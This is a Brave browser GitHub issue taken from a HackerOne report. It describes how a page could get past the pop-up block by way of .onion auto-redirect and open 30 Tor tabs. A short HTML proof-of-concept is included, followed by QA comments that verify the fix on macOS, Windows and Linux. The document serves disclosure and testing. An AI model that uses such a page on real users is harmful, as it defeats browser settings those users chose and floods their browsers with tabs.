[hackerone]: Redirect with Tor tabs #32706

Closed
kdenhartog opened this issue Sep 4, 2023 · 5 comments · Fixed by brave/brave-core#20125

kdenhartog commented Sep 4, 2023

https://hackerone.com/bugs?subject=brave&report_id=2133384

credit: xiaoyinl

Steps To Reproduce:

  1. Host the following HTML somewhere:

     ```html
     <html>
         <head>
             <meta charset="utf-8">
             <title>A Malicious Website</title>
             <script>
                 function spamUsers() {
                     for (let i = 0; i < 30; i++) { document.location.href = 'http://ljsdjfl' + i + '.onion'; }
                 }
             </script>
         </head>
         <body>
             <button onclick="spamUsers()">Start</button>
         </body>
     </html>
     ```

  2. Enable "automatically redirect .onion sites" in Brave, and make sure the default behavior for "pop-ups and redirects" is set to "Don't allow sites to send pop-ups or use redirects"
  3. Navigate to the PoC page. Then click "Start". You can see a new Tor window opens 30 new tabs.

@stephendonner

Hi @boocmp can we get a testplan submitted for this, please? Thanks! 🙏

boocmp commented Oct 5, 2023

> Hi @boocmp can we get a testplan submitted for this, please? Thanks! 🙏

I've added steps to reproduce. Now only one tab should appear in the Tor window.

LaurenWags commented Oct 6, 2023

Verified with

Brave | 1.60.81 Chromium: 118.0.5993.54 (Official Build) beta (x86_64)
-- | --
Revision | 1efb3f333eb41cc34af46ca31fb33c30e0afbfae
OS | macOS Version 13.6 (Build 22G120)

Reproduced the issue using 1.58.137 Chromium: 117.0.5938.153 and STR from description:

Verified only one tab is opened in Tor window when using 1.60.81 Chromium: 118.0.5993.54 and following STR from description.

@LaurenWags LaurenWags added QA/In-Progress Indicates that QA is currently in progress for that particular issue QA Pass-macOS QA/Test-All-Platforms and removed QA/In-Progress Indicates that QA is currently in progress for that particular issue labels Oct 6, 2023
@GeetaSarvadnya

Verification PASSED on

Brave | 1.60.88 Chromium: 118.0.5993.70 (Official Build) beta (64-bit)
-- | --
Revision | ff9150ac5dd9934a7f431ddf478ad3e45ae68546
OS | Windows 10 Version 22H2 (Build 19045.3570)

Reproduced the issue on 1.58.137 using STR from description:

Verified only one tab is opened in Tor window when using 1.60.88 Chromium: 118.0.5993.70 and following STR from description.

@btlechowski

Verified with

Brave | 1.60.102 Chromium: 118.0.5993.96 (Official Build) beta (64-bit)
-- | --
Revision | 3598a9fc6b7752181feb25caa131bc386d6d054c
OS | Linux

Reproduced the issue on 1.59.x

Verified in 1.60.x
